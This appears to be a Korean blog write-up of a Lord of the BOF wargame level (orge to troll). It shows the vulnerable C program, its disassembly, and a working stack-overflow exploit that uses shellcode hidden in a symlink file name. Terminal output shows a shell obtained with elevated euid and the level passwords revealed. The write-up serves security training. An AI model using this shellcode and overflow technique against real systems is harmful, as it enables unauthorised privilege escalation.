728x90
반응형
1. intro
2. code 및 분석
2.1 C code
/*
The Lord of the BOF : The Fellowship of the BOF
- troll
- check argc + argv hunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
// here is changed
if(argc != 2){
printf("argc must be two!\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
// one more!
memset(argv[1], 0, strlen(argv[1]));
}
2.3. 분석
2.3.1. assembler code (중요 부분)
이번에는 인자가 무조건 2개여야하며,
0x8048506 <main+6>: cmpl $0x2,0x8(%ebp)
0x804850a <main+10>: je 0x8048523 <main+35>
0x804850c <main+12>: push $0x8048690
0x8048511 <main+17>: call 0x8048410 <printf>
0x8048516 <main+22>: add $0x4,%esp
0x8048519 <main+25>: push $0x0
0x804851b <main+27>: call 0x8048420 <exit>환경 변수의 argv[1] 영역 또한 초기화 한다.
0x8048613 <main+275>: add $0xc,%esp
0x8048616 <main+278>: mov 0xc(%ebp),%eax
0x8048619 <main+281>: add $0x4,%eax
0x804861c <main+284>: mov (%eax),%edx
0x804861e <main+286>: push %edx
0x804861f <main+287>: call 0x80483f0 <strlen>
0x8048624 <main+292>: add $0x4,%esp
0x8048627 <main+295>: mov %eax,%eax
0x8048629 <main+297>: push %eax
0x804862a <main+298>: push $0x0
0x804862c <main+300>: mov 0xc(%ebp),%eax
0x804862f <main+303>: add $0x4,%eax
0x8048632 <main+306>: mov (%eax),%edx
0x8048634 <main+308>: push %edx
0x8048635 <main+309>: call 0x8048430 <memset>
0x804863a <main+314>: add $0xc,%esp
0x804863d <main+317>: leave
0x804863e <main+318>: ret
0x804863f <main+319>: nop
3. 취약점 확인 및 공격 준비
3.1 취약점
앞선 문제와 동일하다.
3.2 공격 준비
이번에는 모든 영역이 초기화되고, 유일하게 argv[0]인 파일명 부분만 남아있으며, stack 영역을 사용해야하므로 심볼릭 링크를 통한 파일명 shellcode를 사용해야한다.
이를 인터넷에서 찾아보면 아래와 같다.
\x31\xc0\x50\xb8\x2e\x2e\x73\x68\x66\x05\x01\x01\x50\xb8\x2e\x62\x69\x6e\x04\x01\x50\x89\xe3\x31\xc0\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80이를 파일명으로 symbolic link 후 시도해보자.
[orge@localhost orge]$ ln -s trola `python -c 'print "A"*100 + "\x31\xc0\x50\xb8\x2e\x2e\x73\x68\x66\x05\x01\x01\x50\xb8\x2e\x62\x69\x6e\x04\x01\x50\x89\xe3\x31\xc0\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"'`
[orge@localhost orge]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1¸..shf???P¸.bin??P?ᲀP?ᑿᮿ˿
trola
troll
troll.c
4. exploit
간단히 아래와 같이 처리 가능하다.
[orge@localhost orge]$ ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1¸..shf^E^A^AP¸.bin^D^APᲀPᓉᯞK̀ `python -c 'print "A"*44 + "\xbc\xff\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¼ÿÿ¿
bash$ id
uid=507(orge) gid=507(orge) groups=507(orge)
bash$ my-pass
euid = 507
timewalker
[orge@localhost orge]$ ln -s troll `python -c 'print "A"*100 + "\x31\xc0\x50\xb8\x2e\x2e\x73\x68\x66\x05\x01\x01\x50\xb8\x2e\x62\x69\x6e\x04\x01\x50̀\x89\xe3\x31\xc0\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"'`
[orge@localhost orge]$ ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1¸..shf^E^A^AP¸.bin^D^APᲀPᓉᯞK̀ `python -c 'print "A"*44 + "\xbc\xff\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¼ÿÿ¿
bash$ id
uid=507(orge) gid=507(orge) euid=508(troll) egid=508(troll) groups=507(orge)
bash$ my-pass
euid = 508
aspirin물론 지금까지 사용한 my-pass를 실행해주는 shellcode를 수정해도 되겠지만... 귀찮........
원리는 0x2f가 아닌 0x2e + 0x01 과 같은 식으로 어셈블러 코드를 작성해주면 된다.
728x90
반응형
'Wargame > Hackerchool' 카테고리의 다른 글
| [lob] vampire -> skeleton (0) | 2022.09.13 |
|---|---|
| [lob] troll -> vampire (0) | 2022.09.13 |
| [lob] darkelf -> orge (0) | 2022.09.13 |
| [lob] wolfman -> darkelf (0) | 2022.09.13 |
| [lob] orc -> wolfman (0) | 2022.09.12 |